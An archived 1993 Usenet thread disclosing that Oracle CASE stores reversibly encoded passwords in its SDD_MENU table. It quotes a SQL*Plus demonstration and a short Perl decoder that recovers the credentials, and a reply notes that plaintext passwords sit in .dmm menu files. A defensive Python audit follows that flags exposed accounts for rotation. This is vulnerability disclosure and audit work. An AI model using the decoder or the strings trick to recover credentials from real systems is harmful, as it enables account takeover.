Re: Oracle CASE saves passwords to DB [security]

From: branigan d <p0054467_at_oxford-brookes.ac.uk>
Date: 16 Sep 1993 05:20:16 -0500
Message-ID: <CDFzAC.Bqw_at_uk.ac.brookes>


Allu Helenius (ahe_at_th.tele.fi) wrote:
: Howdy,
 

: While I was installing Oracle CASE (Dictionary 5.0.11.13.3 and
: Designer 1.1.21.5.0), I noticed that some parts of the CASE products
: exchange Oracle passwords via database. Saving passwords is something
: you never do, not even in encoded form like this example!!
 

: I browsed CASE*Dictionary Reference Guide and Administration Guide
: to see if this bug was documented, but found nothing. Is it somewhere
: else, I don't know. But I doubt.

: Try this to check whether your version of CASE contains this feature:
 

: $ casedict -ins
: CASE*Dictionary (TM): Version 5.0.22.6.0 - Production on Wed Sep 15 15:19:42 1993
 

: Copyright (c) Oracle Corporation 1979, 1992. All rights reserved.
 

: Usage: casedict -ins name/passwd report

: With -ins option CASE*Dictionary saves name/passwd for report report
: to column MU_ID of table SDD_MENU. Here is a SQL*Plus script to
: demonstrate what happens: ('arkki' is an Oracle user name)
 

: set heading off feedback off
: column mu_id format a40
: grant connect to arkki identified by CASE;
: !casedict -ins arkki/CASE myreport >/dev/null
: select 'CASE',mu_id from sdd_menu where mu_block='myreport';
: grant connect to arkki identified by dIcTioNarY;
: !casedict -ins arkki/dIcTioNarY myreport >/dev/null
: select 'dIcTioNarY',mu_id from sdd_menu where mu_block='myreport';
: grant connect to arkki identified by STINKS;
: !casedict -ins arkki/STINKS myreport >/dev/null
: select 'STINKS',mu_id from sdd_menu where mu_block='myreport';
 

: Here is the shortened output of the script:
 

: CASE [g`\g/=0O@
: dIcTioNarY [g`\g/^8_OcdCRpY
: STINKS [g`\g/MCEIEH
 

: I used about fifteen minutes to analyze this (and some other) output
: and to write this perl script, which decodes these passwords:
 

: #!/usr/bin/perl
: # CASE password decoder, Allu Helenius 1993
: # - see how easy it is
:
: @key=split(//,";662?A;0=<");
: push(@key,@key,@key,@key); # enough..
:
: while (<>) {
:     chop;
:     @c = split(//);
:     @p=();
:     for ($i=0; $i<@c; $i++) {
:         push(@p,pack("C",ord(@c[$i])+ord("A")-ord(@key[$i])));
:     }
:     print @p,"\n";
: }
 

: Here are the passwords above opened:
 

: $ ./crackcasepass
: [g`\g/=0O@
: arkki/CASE
: [g`\g/^8_OcdCRpY
: arkki/dIcTioNarY
: [g`\g/MCEIEH
: arkki/STINKS

: I've published this information in order to give a security lesson
: to Oracle's programmers. This is not the way to make secure systems!!
: Security through obscurity isn't security at all!!

: Oh, one more thing. Casedict's usage says there's an option:
 

: -z Don't store the password.
 

: What is it? Is there a default always to save the password? Oh no...
: Well, whatever it is, it does not affect the example above, because
: it's CASE*Designer Entity Relationship Diagrammer's Reports which
: at least call 'casedict -ins'...
 

: Happy computing,
 

: Allu
: --
: Allu Helenius, Telecom Finland
 

: The platform Oracle works best is 35mm slide projector.

--
        This you call a security hole ?

        Try running 'strings' on a .dmm file. (If you change username /
password when running menu options - so users don't know where the tables
really are - unless you are extremely devious they will be easily seen in the
.dmm file. AND THE USER HAS TO HAVE READ ACCESS TO IT TO USE THE MENUS !)

        No clever shell scripts, no decoding, it's in ASCII large as life and
twice as beautiful.

_______________________________________________________________________________

   Damian Branigan                "So anyway here the story stays
   (Project Leader ISS)            As far at least as I understand
   d.branigan_at_brookes.ac.uk        And Robert Browning you writer of plays
                                   Here's a story made to your hand."       RB
_______________________________________________________________________________
Received on Thu Sep 16 1993 - 12:20:16 CEST
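
Added example, not part of either post and not Oracle's code: a defender-side audit in Python that reuses the key and shift rule from the quoted Perl decoder to list which accounts have a recoverable password in exported SDD_MENU rows, without printing the passwords. The (mu_block, mu_id) row layout, the cycling of the key past ten characters and all function names are assumptions of this example.

```python
# Added audit example (not from the original posts). KEY and the shift rule come
# from the Perl decoder quoted in the thread; the row layout is an assumption.
KEY = ";662?A;0=<"

def decode_mu_id(value: str) -> str:
    """Undo the per-position shift: plain = cipher + ord('A') - key[i mod len(key)]."""
    out = []
    for i, ch in enumerate(value):
        code = ord(ch) + ord("A") - ord(KEY[i % len(KEY)])
        out.append(chr(code) if 0 <= code < 0x110000 else "\ufffd")
    return "".join(out)

def exposed_account(value: str):
    """Return the account name if value decodes to printable name/passwd, else None."""
    plain = decode_mu_id(value)
    name, sep, passwd = plain.partition("/")
    if not sep or not name or not passwd:
        return None
    if not all(33 <= ord(c) < 127 for c in name + passwd):
        return None
    return name  # the password itself is deliberately never returned or logged

def audit(rows):
    """rows: iterable of (mu_block, mu_id). Returns sorted (account, mu_block) findings."""
    findings = set()
    for mu_block, mu_id in rows:
        account = exposed_account(mu_id or "")
        if account:
            findings.add((account, mu_block))
    return sorted(findings)

# Sample rows: the first three MU_ID values are the ones shown in the post;
# the last row is a constructed value that is not a stored credential.
SAMPLE_ROWS = [
    ("myreport", "[g`\\g/=0O@"),
    ("myreport", "[g`\\g/^8_OcdCRpY"),
    ("myreport", "[g`\\g/MCEIEH"),
    ("mainmenu", "MENU_01"),
]

if __name__ == "__main__":
    for account, block in audit(SAMPLE_ROWS):
        print(f"rotate password for {account}: recoverable from SDD_MENU (mu_block={block})")
```

Every account the audit lists should have its password changed, and read access to SDD_MENU reviewed, since the stored value is reversible by anyone who can select it.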
